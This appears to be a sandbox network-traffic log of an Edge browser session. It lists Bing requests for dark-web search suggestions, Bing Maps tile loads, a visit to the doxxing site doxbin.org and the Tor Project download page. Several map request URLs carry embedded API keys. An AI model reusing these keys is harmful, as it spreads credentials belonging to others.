GET https://th.bing.com/th?id=OSK.669cc86d9e9277997ac6c795a129bdf0&w=80&h=80&c=7&o=6&pid=SANGAM

HTTP Request

GET https://th.bing.com/th?id=OSK.8d3733568bf8db9e45e1ce65c56cbad8&w=80&h=80&c=7&o=6&pid=SANGAM

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://th.bing.com/th?id=OSK.3ca73608bac0cd5349007514cbd625ce&w=46&h=46&c=11&rs=1&qlt=80&o=6&dpr=2&pid=SANGAM

HTTP Request

GET https://th.bing.com/th?id=ODL.d1dc2aff5e187a8bd51dbd73951abbba&w=100&h=100&c=12&pcl=faf9f7&o=6&pid=23.1

HTTP Request

GET https://th.bing.com/th?id=ODL.a0453fbb04242835d1b15489b390a676&w=100&h=100&c=12&pcl=faf9f7&o=6&pid=23.1

HTTP Request

GET https://th.bing.com/th?id=OLC.enjkge4wuxclNw480x360&w=198&h=100&c=3&rs=1&qlt=80&o=6&cdv=1&pid=Local

HTTP Request

GET https://th.bing.com/th?id=OLC.nXkLF6lHAiUfGQ480x360&w=198&h=100&c=3&rs=1&qlt=80&o=6&cdv=1&pid=Local

HTTP Request

GET https://th.bing.com/th?id=OSK.3ca73608bac0cd5349007514cbd625ce&w=102&h=102&c=7&o=6&pid=SANGAM

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://th.bing.com/th?id=OIP.IsRnev_WQ6d0GHyWRL00cgHaEL&w=80&h=80&c=1&vt=9&bgcl=d7fade&r=0&o=6&pid=5.1

HTTP Response

200

HTTP Request

GET https://th.bing.com/th?id=OSK.saS2i06jv3ATmkJh8xzUkOCdvF9RSnGunSanx3jQmXs&w=120&h=120&c=6&p=0&pid=RS

HTTP Request

GET https://th.bing.com/th?id=OSK.dfd24e1bbabcb5712dc2cb8d93c600ac&w=120&h=120&c=6&p=0&pid=RS

HTTP Request

GET https://th.bing.com/th?id=OSK.1afcb69f3cff6e025e4f2de83fd8416c&w=120&h=120&c=6&p=0&pid=RS

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://th.bing.com/th?id=ODLS.f047d28e-f1f4-46c2-af00-a0dcedcd7c73&w=32&h=32&qlt=90&pcl=fffffa&o=6&pid=1.2

HTTP Request

GET https://th.bing.com/th?id=OIP.ZIKPPAtrb_mH2giGgu2nyQHaEK&w=80&h=80&c=1&vt=10&bgcl=c8cf25&r=0&o=6&pid=5.1

HTTP Request

GET https://th.bing.com/th?id=OVP.R1kmKekxnEGNtcvRzl1u8AHgFo&w=197&h=110&c=7&rs=1&qlt=90&o=6&pid=1.7

HTTP Request

GET https://th.bing.com/th?q=Dark+Web+Websites&w=120&h=50&c=7&rs=1&qlt=90&p=0&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1

HTTP Request

GET https://th.bing.com/th?q=Dark+Web+Film&w=120&h=50&c=7&rs=1&qlt=90&p=0&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1

HTTP Request

GET https://th.bing.com/th?q=Scary+Dark+Web&w=120&h=50&c=7&rs=1&qlt=90&p=0&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1

HTTP Request

GET https://th.bing.com/th?q=How+to+Access+Dark+Web&w=120&h=50&c=7&rs=1&qlt=90&p=0&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1

HTTP Request

GET https://th.bing.com/th?q=Browse+Dark+Web&w=120&h=50&c=7&rs=1&qlt=90&p=0&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1

HTTP Request

GET https://th.bing.com/th?id=ODLS.187c0f58-21cd-40a8-a334-6342e9abce82&w=32&h=32&qlt=91&pcl=fffffa&o=6&pid=1.2

HTTP Request

GET https://th.bing.com/th?id=OIP.RFwzjeXVn3MsUAAuJVujZAHaEa&w=80&h=80&c=1&vt=10&bgcl=be7602&r=0&o=6&pid=5.1

HTTP Request

GET https://th.bing.com/th?id=ODLS.34827b78-0d1b-43ad-9aac-ade7717dedc6&w=32&h=32&qlt=92&pcl=fffffa&o=6&pid=1.2

HTTP Request

GET https://th.bing.com/th?id=OIP.68RDcPUa6hYdj6mnC4titwHaEK&w=80&h=80&c=1&vt=10&bgcl=4e9347&r=0&o=6&pid=5.1

HTTP Request

GET https://th.bing.com/th?id=ODLS.9d837793-b21b-4809-aceb-f60f4a0b6408&w=32&h=32&qlt=93&pcl=fffffa&o=6&pid=1.2

HTTP Request

GET https://th.bing.com/th?id=ODLS.556012ce-8971-4b7b-b395-05f8c4e2e6e8&w=32&h=32&qlt=94&pcl=fffffa&o=6&pid=1.2

HTTP Request

GET https://th.bing.com/th?id=ODLS.ff35f8d0-59f3-48bd-8430-c9ebbab5d80f&w=32&h=32&qlt=95&pcl=fffffa&o=6&pid=1.2

HTTP Request

GET https://th.bing.com/th?id=OIP.aW2l55-ZD1un3cimxTPzmAHaD4&w=80&h=80&c=1&vt=10&bgcl=ae4f3d&r=0&o=6&pid=5.1

HTTP Request

GET https://th.bing.com/th?id=ODLS.cc5e5b13-9eb8-40ed-8ebc-14cd84fdfbb7&w=16&h=16&c=7&o=6&pid=1.7

HTTP Request

GET https://th.bing.com/th?id=OIP.Oq62JUC-Gx6P-rkRp8kPPwHgFo&w=248&h=121&c=7&rs=1&p=0&o=5&pid=1.7

HTTP Request

GET https://th.bing.com/th?id=ODLS.9360e76b-af7e-411e-a12e-f0b3ad687e62&w=16&h=16&c=7&o=6&pid=1.7

HTTP Request

GET https://th.bing.com/th?id=ODLS.88390ebb-fd85-4b20-be65-a20d14bad498&w=32&h=32&qlt=96&pcl=fffffa&o=6&pid=1.2

HTTP Request

GET https://th.bing.com/th?id=OIP.TlKLzmlUDOQQQyei_8UCfgHaDt&w=80&h=80&c=1&vt=10&bgcl=6f0c69&r=0&o=6&pid=5.1

HTTP Request

GET https://th.bing.com/th?id=ODLS.ec425630-a5e1-4086-9f28-d2445866eb09&w=32&h=32&qlt=97&pcl=fffffa&o=6&pid=1.2

HTTP Request

GET https://th.bing.com/th?id=OIP.6Wa7yuw0IeCUux3NuTq2ZwHaGP&w=80&h=80&c=1&vt=10&bgcl=26b666&r=0&o=6&pid=5.1

HTTP Request

GET https://th.bing.com/th?id=ODLS.26b53f28-9fe7-4793-b7fc-d9001d03db47&w=32&h=32&qlt=98&pcl=fffffa&o=6&pid=1.2

HTTP Request

GET https://th.bing.com/th?id=ODLS.f05dd542-42b2-46ba-8178-5e3747f79484&w=32&h=32&qlt=99&pcl=fffffa&o=6&pid=1.2

HTTP Request

GET https://th.bing.com/th?id=OIP.WgAFMiMCeLa8dlpNutT7dwHaFb&w=80&h=80&c=1&vt=10&bgcl=96a1b3&r=0&o=6&pid=5.1

HTTP Request

GET https://th.bing.com/th?id=OSK.TMLNWuIbCrM63QqE5sltREteU3gCth5yFMSvLyjRGdTK7Es&w=150&h=220&c=7&o=6&pid=SANGAM

HTTP Request

GET https://th.bing.com/th?id=OSK.f26bf61d4e3becf4df6936414f0865ab&w=80&h=80&c=7&o=6&pid=SANGAM

HTTP Request

GET https://th.bing.com/th?id=OSK.afde16707eea1f9685bc3189e85ce9f7&w=80&h=80&c=7&o=6&pid=SANGAM

HTTP Request

GET https://th.bing.com/th?id=OSK.0dbe33b9e05af3badbe8d6b4e57f4e0c&w=80&h=80&c=7&o=6&pid=SANGAM

HTTP Request

GET https://th.bing.com/th?id=OSK.81e8df0ec566d93c71b3f1e0d1775ada&w=80&h=80&c=7&o=6&pid=SANGAM

HTTP Request

GET https://th.bing.com/th?id=OSK.0462c705239330aba086ab83f23bc6a8&w=80&h=80&c=7&o=6&pid=SANGAM

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://th.bing.com/th?id=OVP.4FvAebnC2mNBb6K6_SBIbQHgFo&w=197&h=110&c=7&rs=1&qlt=90&o=6&pid=1.7

HTTP Request

GET https://th.bing.com/th?id=OVP.dA449c-N9Zzje0ZEZgq5RAHgFo&w=197&h=110&c=7&rs=1&qlt=90&o=6&pid=1.7

HTTP Request

GET https://th.bing.com/th?id=OVP.I4s5HEEfmwG1zIb3b1xa4AHgFo&w=197&h=110&c=7&rs=1&qlt=90&o=6&pid=1.7

HTTP Request

GET https://th.bing.com/th?id=OSK.HEROD-bdfcZqvFucXXU3OOLsupJiezPhEh152Y8fjhUKjFs&w=384&h=228&c=1&rs=2&o=6&pid=SANGAM

HTTP Request

GET https://th.bing.com/th?id=OSK.8faa4c81eed9d8c9be2a3d9b216dc9c8&w=80&h=80&c=7&o=6&pid=SANGAM

HTTP Request

GET https://th.bing.com/th?id=OSK.d7cd4078f6a1e41638f732cf8cb624b3&w=80&h=80&c=7&o=6&pid=SANGAM

HTTP Request

GET https://th.bing.com/th?id=OSK.05599d933da2bf7c64937a7b957a4018&w=80&h=80&c=7&o=6&pid=SANGAM

HTTP Request

GET https://th.bing.com/th?id=OSK.12d207e0aac469eced49fe1bb0e6d997&w=80&h=80&c=7&o=6&pid=SANGAM

HTTP Request

GET https://th.bing.com/th?id=OSK.d7f5f510a0ac4e291e226e0bf78da3f8&w=80&h=80&c=7&o=6&pid=SANGAM

HTTP Request

GET https://th.bing.com/th?id=OSK.TMLNqhJkLVrp4vTjzMfIbH-P9IhS68LAT_gKdO53oRXCIrU&w=150&h=220&c=7&o=6&pid=SANGAM

HTTP Request

GET https://th.bing.com/th?id=OSK.TMLNNsKAu8Kpk_lwr5jCr0jkVd-ZDBwT_zMgeCibDxkJxv8&w=150&h=220&c=7&o=6&pid=SANGAM

HTTP Request

GET https://th.bing.com/th?id=OSK.TMLNuSu6eL625Q2EklnX_l4bg5Re0f3LogiBAcnAR3VoVr8&w=150&h=220&c=7&o=6&pid=SANGAM

HTTP Request

GET https://th.bing.com/th?id=OSK.G17LKgnZZnLcZsAx4jJJNX8QFSkhCIBxY7tjaKPsQnI&w=184&h=69&o=6&pid=SANGAM

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://th.bing.com/th?id=OM.qSiAn2rL_oXwYA_1729958581&pid=1.7

HTTP Request

GET https://th.bing.com/th?id=OM.O7VMvp4ASRTmtQ_1730437955&pid=1.7

HTTP Response

206

HTTP Request

GET https://th.bing.com/th?id=OM.QxGHtGzYVpy0Ow_1723947821&pid=1.7

HTTP Response

206

HTTP Request

GET https://th.bing.com/th?id=OM.1KoGchzMzsnwlw_1731963521&pid=1.7

HTTP Response

206

HTTP Request

GET https://th.bing.com/th?id=OSAAS.41ABDF9130FED43626AC42D0DB458584&w=72&h=72&c=1&rs=1&o=6&pid=TechQna

HTTP Response

200

HTTP Request

GET https://th.bing.com/th?id=ODLS.0166d99a-6c0a-4f97-82c0-5b2c4af3f24e&w=32&h=32&o=6&pid=AdsPlus

HTTP Request

GET https://th.bing.com/th?id=ODLS.88390ebb-fd85-4b20-be65-a20d14bad498&w=32&h=32&qlt=90&pcl=fffffa&o=6&pid=1.2

HTTP Request

GET https://th.bing.com/th?id=OIP.TlKLzmlUDOQQQyei_8UCfgHaDt&w=80&h=80&c=1&vt=10&bgcl=a4d2e7&r=0&o=6&pid=5.1

HTTP Request

GET https://th.bing.com/th?id=ODLS.02d06900-33f2-4750-a0d3-b071f950d15d&w=32&h=32&qlt=91&pcl=fffffa&o=6&pid=1.2

HTTP Request

GET https://th.bing.com/th?id=OIP.l7hD8JdMSQnbprqVzv2IjgHaEK&w=80&h=80&c=7&qlt=80&o=6&pid=13.1

HTTP Request

GET https://th.bing.com/th?q=Dark+Web+Browser&w=120&h=50&c=7&rs=1&qlt=90&p=0&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1

HTTP Request

GET https://th.bing.com/th?q=Dark+Web+Enter&w=120&h=50&c=7&rs=1&qlt=90&p=0&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1

HTTP Request

GET https://th.bing.com/th?q=Tor+Browser+Download&w=120&h=50&c=7&rs=1&qlt=90&p=0&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1

HTTP Request

GET https://th.bing.com/th?q=Dark+Web+Shopping&w=120&h=50&c=7&rs=1&qlt=90&p=0&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1

HTTP Request

GET https://th.bing.com/th?q=Dark+Web+Access&w=120&h=50&c=7&rs=1&qlt=90&p=0&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1

HTTP Request

GET https://th.bing.com/th?id=ODLS.88390ebb-fd85-4b20-be65-a20d14bad498&w=32&h=32&qlt=92&pcl=fffffa&o=6&pid=1.2

HTTP Request

GET https://th.bing.com/th?id=OIP.TlKLzmlUDOQQQyei_8UCfgHaDt&w=80&h=80&c=1&vt=10&bgcl=162879&r=0&o=6&pid=5.1

HTTP Request

GET https://th.bing.com/th?id=ODLS.88390ebb-fd85-4b20-be65-a20d14bad498&w=32&h=32&qlt=93&pcl=fffffa&o=6&pid=1.2

HTTP Request

GET https://th.bing.com/th?id=OIP.TlKLzmlUDOQQQyei_8UCfgHaDt&w=80&h=80&c=1&vt=10&bgcl=35a6b6&r=0&o=6&pid=5.1

HTTP Request

GET https://th.bing.com/th?id=ODLS.A2450BEC-5595-40BA-9F13-D9EC6AB74B9F&w=32&h=32&qlt=94&pcl=fffffa&o=6&pid=1.2

HTTP Request

GET https://th.bing.com/th?id=OIP.lqYiQnLswjZsfE-FgdTFPgAAAA&w=80&h=80&c=1&vt=10&bgcl=49cb0b&r=0&o=6&pid=5.1

HTTP Request

GET https://th.bing.com/th?id=ODLS.A2450BEC-5595-40BA-9F13-D9EC6AB74B9F&w=32&h=32&qlt=95&pcl=fffffa&o=6&pid=1.2

HTTP Request

GET https://th.bing.com/th?id=OIP.Z3PR9Rt8bvj84BMxrqe6YwHaFJ&w=80&h=80&c=1&vt=10&bgcl=74f1cf&r=0&o=6&pid=5.1

HTTP Request

GET https://th.bing.com/th?id=ODLS.b6087622-806e-4147-afe9-58a9168da92f&w=32&h=32&o=6&pid=AdsPlus

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://th.bing.com/th?id=OVP.EI3-oP7ngHedRhWMRNZzEAHgFo&w=197&h=110&c=7&rs=1&qlt=90&o=6&pid=1.7

HTTP Response

200
88.221.135.3:443

th.bing.com

tls, http2

msedge.exe

1.0kB
5.1kB
9
11
23.73.138.225:443

https://t.ssl.ak.tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?count=500&north=51.583896602976495&south=51.45571839040852&east=0.02883911132764183&west=-0.24581909179784134&key=AjU_16GwO6ItEGYEwnGxFdX73pxPEMeHN1suGnUoIAMqnrAK0tx4DcvG1-BEuCe3&g=14848

tls, http2

msedge.exe

11.0kB
319.9kB
175
255

HTTP Request

GET https://t.ssl.ak.dynamic.tiles.virtualearth.net/comp/stl?ctpv=5&og=2578

HTTP Request

GET https://t.ssl.ak.dynamic.tiles.virtualearth.net/comp/stl?ods=mvt&sharedcs=1&v=9.33&og=2578

HTTP Request

GET https://t.ssl.ak.dynamic.tiles.virtualearth.net/comp/stl/sprite.json?ods=mvt&mbxs=33b050cc-ba4e-4350-a5b7-4171aec234a2&ur=us&v=9.33&og=2578&features=mvttxtmaxw,logo,lmktxtopt&mkt=en-GB&txtfit=tf

HTTP Request

GET https://t.ssl.ak.dynamic.tiles.virtualearth.net/comp/ch/10-512-340.mvt?mkt=en-GB&it=G,LC,AP,L,LA&jp=0&js=1&tj=1&ur=gb&cstl=s23&mvt=1&features=mvt,mvttxtmaxw,mvtfcall,lsoft&og=2578&st=bld|v:0_g|pv:1&sv=9.33

HTTP Request

GET https://t.ssl.ak.dynamic.tiles.virtualearth.net/comp/stl?ods=mvt&cs=33B050CC-BA4E-4350-A5B7-4171AEC234A2&v=9.33&og=2578&culture=en-GB

HTTP Request

GET https://t.ssl.ak.dynamic.tiles.virtualearth.net/comp/ch/10-511-340.mvt?mkt=en-GB&it=G,LC,AP,L,LA&jp=0&js=1&tj=1&ur=gb&cstl=s23&mvt=1&features=mvt,mvttxtmaxw,mvtfcall,lsoft&og=2578&st=bld|v:0_g|pv:1&sv=9.33

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://t.ssl.ak.tiles.virtualearth.net/tiles/sre03131313111?g=14792&n=t

HTTP Request

GET https://t.ssl.ak.tiles.virtualearth.net/tiles/sre03131313110?g=14792&n=t

HTTP Request

GET https://t.ssl.ak.tiles.virtualearth.net/tiles/sre03131313112?g=14792&n=t

HTTP Request

GET https://t.ssl.ak.tiles.virtualearth.net/tiles/sre12020202000?g=14792&n=t

HTTP Request

GET https://t.ssl.ak.tiles.virtualearth.net/tiles/sre12020202002?g=14792&n=t

HTTP Request

GET https://t.ssl.ak.tiles.virtualearth.net/tiles/sre03131313113?g=14792&n=t

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://t.ssl.ak.tiles.virtualearth.net/tiles/cmd/BirdsEyeSceneMetaData?north=51.6198525907427&south=51.4198525907427&east=-0.008489990234374994&west=-0.208489990234375&count=100&g=11124&dir=&ver=0

HTTP Request

GET https://t.ssl.ak.tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?count=500&north=51.583896602976495&south=51.45571839040852&east=0.02883911132764183&west=-0.24581909179784134&key=AlsPah6FU95S91QfKxKIrg5i97ocZvZDopAQrElSZJzf5uMxZiRuUiZlAt5dDtEK&g=14848

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://t.ssl.ak.tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?count=500&north=51.583896602976495&south=51.45571839040852&east=0.02883911132764183&west=-0.24581909179784134&key=AjU_16GwO6ItEGYEwnGxFdX73pxPEMeHN1suGnUoIAMqnrAK0tx4DcvG1-BEuCe3&g=14848

HTTP Response

200
23.73.138.225:443

t.ssl.ak.dynamic.tiles.virtualearth.net

tls

msedge.exe

885 B
4.7kB
8
8
23.73.138.225:443

t.ssl.ak.dynamic.tiles.virtualearth.net

tls

msedge.exe

931 B
4.8kB
9
9
23.73.138.225:443

t.ssl.ak.dynamic.tiles.virtualearth.net

tls

msedge.exe

931 B
4.7kB
9
6
23.73.138.225:443

t.ssl.ak.dynamic.tiles.virtualearth.net

tls

msedge.exe

931 B
4.7kB
9
7
23.73.138.225:443

t.ssl.ak.dynamic.tiles.virtualearth.net

tls

msedge.exe

931 B
4.7kB
9
6
13.107.246.64:443

https://dev.virtualearth.net/REST/V1/Imagery/Copyright/en-GB/RoadOnDemand/11/51.45571839040852/-0.24581909179784134/51.583896602976495/0.02883911132764183?output=json&dir=0&jsonp=Microsoft.Maps.NetworkCallbacks.normal&jsonso=6de6e&key=AjU_16GwO6ItEGYEwnGxFdX73pxPEMeHN1suGnUoIAMqnrAK0tx4DcvG1-BEuCe3&ml=B,BF&ur=gb&c=en-GB&setfeatures=

tls, http2

msedge.exe

3.0kB
11.6kB
20
26

HTTP Request

GET https://dev.virtualearth.net/REST/V1/Imagery/Copyright/en-GB/RoadOnDemand/11/51.45571839040852/-0.24581909179784134/51.583896602976495/0.02883911132764183?output=json&dir=0&jsonp=Microsoft.Maps.NetworkCallbacks.normal&jsonso=6f423&key=AlsPah6FU95S91QfKxKIrg5i97ocZvZDopAQrElSZJzf5uMxZiRuUiZlAt5dDtEK&ml=B,BF&ur=gb&c=en-GB&setfeatures=

HTTP Response

200

HTTP Request

GET https://dev.virtualearth.net/REST/V1/Imagery/Copyright/en-GB/RoadOnDemand/11/51.45571839040852/-0.24581909179784134/51.583896602976495/0.02883911132764183?output=json&dir=0&jsonp=Microsoft.Maps.NetworkCallbacks.normal&jsonso=6de6e&key=AjU_16GwO6ItEGYEwnGxFdX73pxPEMeHN1suGnUoIAMqnrAK0tx4DcvG1-BEuCe3&ml=B,BF&ur=gb&c=en-GB&setfeatures=

HTTP Response

200
13.107.246.64:443

https://landmark3dweb.azureedge.net/flyovers/1.0.383/_flyovers.json

tls, http2

msedge.exe

2.8kB
18.3kB
25
30

HTTP Request

GET https://landmark3dweb.azureedge.net/flyovers/version.txt

HTTP Response

200

HTTP Request

GET https://landmark3dweb.azureedge.net/flyovers/1.0.383/_flyovers.json

HTTP Response

200
91.215.42.4:80

http://doxbin.org/

http

msedge.exe

810 B
1.4kB
8
6

HTTP Request

GET http://doxbin.org/

HTTP Response

301
91.215.42.4:80

doxbin.org

msedge.exe

190 B
132 B
4
3
91.215.42.4:443

https://doxbin.org/files/cdox.png

tls, http2

msedge.exe

73.9kB
488.6kB
272
383

HTTP Request

GET https://doxbin.org/

HTTP Response

403

HTTP Request

GET https://doxbin.org/.well-known/ddos-guard/check?context=free_splash

HTTP Response

200

HTTP Request

GET https://doxbin.org/.well-known/ddos-guard/id/i01KOlwbXtN3c1Hx

HTTP Response

200

HTTP Request

GET https://doxbin.org/favicon.ico

HTTP Response

404

HTTP Request

POST https://doxbin.org/.well-known/ddos-guard/mark/

HTTP Response

200

HTTP Request

GET https://doxbin.org/

HTTP Response

200

HTTP Request

GET https://doxbin.org/legacy/index.css

HTTP Request

GET https://doxbin.org/legacy/css/main.css?r=44

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://doxbin.org/legacy/dropdown.css

HTTP Request

GET https://doxbin.org/files/doxbin.css?r=5

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://doxbin.org/legacy/jquery.min.js

HTTP Request

GET https://doxbin.org/legacy/logout.js

HTTP Request

GET https://doxbin.org/files/snowflakes.js

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://doxbin.org/files/cdox.png

HTTP Response

200

HTTP Response

200
185.129.100.100:443

https://check.ddos-guard.net/set/id/i01KOlwbXtN3c1Hx

tls, http2

msedge.exe

2.0kB
7.5kB
17
19

HTTP Request

GET https://check.ddos-guard.net/check.js

HTTP Response

200

HTTP Request

GET https://check.ddos-guard.net/set/id/i01KOlwbXtN3c1Hx

HTTP Response

200
104.18.11.207:443

https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js

tls, http2

msedge.exe

2.6kB
21.2kB
31
42

HTTP Request

GET https://netdna.bootstrapcdn.com/font-awesome/4.0.3/css/font-awesome.css

HTTP Response

200

HTTP Request

GET https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js

HTTP Response

200
95.129.232.35:443

https://cdn.doxbin.net/purple.gif

tls, http2

msedge.exe

3.4kB
76.6kB
48
70

HTTP Request

GET https://cdn.doxbin.net/gold.gif

HTTP Request

GET https://cdn.doxbin.net/red.gif

HTTP Request

GET https://cdn.doxbin.net/purple.gif

HTTP Response

200

HTTP Response

200

HTTP Response

200
95.129.232.35:443

cdn.doxbin.net

tls

msedge.exe

885 B
3.4kB
8
6
95.129.232.35:443

cdn.doxbin.net

tls

msedge.exe

885 B
3.4kB
8
6
88.221.135.3:443

th.bing.com

tls, http2

msedge.exe

1.0kB
930 B
8
8
88.221.135.3:443

th.bing.com

tls, http2

msedge.exe

1.0kB
946 B
8
8
150.171.28.10:443

https://tse1.mm.bing.net/th?&id=OVP.R1kmKekxnEGNtcvRzl1u8AHgFo&w=197&h=110&c=7&pid=1.7&rs=1

tls, http2

msedge.exe

3.3kB
31.0kB
30
43

HTTP Request

GET https://tse1.mm.bing.net/th?&id=OVP.4FvAebnC2mNBb6K6_SBIbQHgFo&w=197&h=110&c=7&pid=1.7&rs=1

HTTP Response

200

HTTP Request

GET https://tse1.mm.bing.net/th?&id=OVP.dA449c-N9Zzje0ZEZgq5RAHgFo&w=197&h=110&c=7&pid=1.7&rs=1

HTTP Response

200

HTTP Request

GET https://tse1.mm.bing.net/th?&id=OVP.I4s5HEEfmwG1zIb3b1xa4AHgFo&w=197&h=110&c=7&pid=1.7&rs=1

HTTP Response

200

HTTP Request

GET https://tse1.mm.bing.net/th?&id=OVP.R1kmKekxnEGNtcvRzl1u8AHgFo&w=197&h=110&c=7&pid=1.7&rs=1

HTTP Response

200
23.73.137.233:443

https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp

tls, http

msedge.exe

2.1kB
6.4kB
22
23

HTTP Request

OPTIONS https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp

HTTP Response

504
23.73.137.233:443

https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE

tls, http

msedge.exe

2.0kB
6.3kB
21
21

HTTP Request

OPTIONS https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE

HTTP Response

503
95.101.143.218:443

th.bing.com

tls, http2

msedge.exe

1.0kB
930 B
8
8
204.8.99.144:443

https://www.torproject.org/static/images/yec/illo-yec-speak.png?h=abdc7268

tls, http

msedge.exe

9.7kB
247.1kB
123
189

HTTP Request

GET https://www.torproject.org/static/fonts/fontawesome/css/all.min.css?h=9d272f6a

HTTP Response

200

HTTP Request

GET https://www.torproject.org/static/js/jquery-3.2.1.min.js?h=1055018c

HTTP Response

200

HTTP Request

GET https://www.torproject.org/static/fonts/fontawesome/webfonts/fa-solid-900.woff2

HTTP Response

200

HTTP Request

GET https://www.torproject.org/static/images/yec/heart.png?h=ad369acb

HTTP Response

200

HTTP Request

GET https://www.torproject.org/static/fonts/fontawesome/png/white/solid/arrow-down.png

HTTP Response

200

HTTP Request

GET https://www.torproject.org/static/images/yec/illo-yec-speak.png?h=abdc7268

HTTP Response

200
204.8.99.144:443

https://www.torproject.org/static/images/yec/heart.svg?h=ad369acb

tls, http

msedge.exe

12.8kB
330.5kB
137
249

HTTP Request

GET https://www.torproject.org/download/

HTTP Response

200

HTTP Request

GET https://www.torproject.org/static/css/bootstrap.css?h=fb444024

HTTP Response

200

HTTP Request

GET https://www.torproject.org/static/js/popper.min.js?h=a4336719

HTTP Response

200

HTTP Request

GET https://www.torproject.org/static/fonts/Space/SpaceGrotesk-Bold.ttf

HTTP Response

200

HTTP Request

GET https://www.torproject.org/static/fonts/SourceSansPro/SourceSansPro-Bold.ttf

HTTP Response

200

HTTP Request

GET https://www.torproject.org/static/images/download/png/get-connected@3x.png?h=5e2656db

HTTP Response

200

HTTP Request

GET https://www.torproject.org/static/fonts/fontawesome/webfonts/fa-regular-400.woff2

HTTP Response

200

HTTP Request

GET https://www.torproject.org/static/fonts/fontawesome/png/primary/regular/file-alt.png

HTTP Response

200

HTTP Request

GET https://www.torproject.org/static/fonts/fontawesome/png/white/brands/twitter.png

HTTP Response

200

HTTP Request

GET https://www.torproject.org/static/images/yec/heart.svg?h=ad369acb

HTTP Response

200
204.8.99.144:443

https://www.torproject.org/static/images/yec/x-dark.svg?h=353e04cc

tls, http

msedge.exe

10.8kB
330.1kB
133
246

HTTP Request

GET https://www.torproject.org/static/js/scrollspy.min.js?h=02674132

HTTP Response

200

HTTP Request

GET https://www.torproject.org/static/fonts/SourceSansPro/SourceSansPro-Regular.ttf

HTTP Response

200

HTTP Request

GET https://www.torproject.org/static/images/yec/illo-yec-search.png?h=347ed4b2

HTTP Response

200

HTTP Request

GET https://www.torproject.org/static/fonts/fontawesome/png/white/brands/windows.png

HTTP Response

200

HTTP Request

GET https://www.torproject.org/static/fonts/fontawesome/png/white/brands/apple.png

HTTP Response

200

HTTP Request

GET https://www.torproject.org/static/images/tb85/tb85@2x.png

HTTP Response

200

HTTP Request

GET https://www.torproject.org/static/images/yec/x-dark.svg?h=353e04cc

HTTP Response

200
204.8.99.144:443

https://www.torproject.org/static/images/yec/illo-yec-speak.png?h=abdc7268

tls, http

msedge.exe

14.3kB
336.8kB
159
255

HTTP Request

GET https://www.torproject.org/static/js/download.js?h=caaadf8f

HTTP Response

200

HTTP Request

GET https://www.torproject.org/static/fonts/SourceSansPro/SourceSansPro-Light.ttf

HTTP Response

200

HTTP Request

GET https://www.torproject.org/static/js/fallback.js?h=8a716acd

HTTP Response

200

HTTP Request

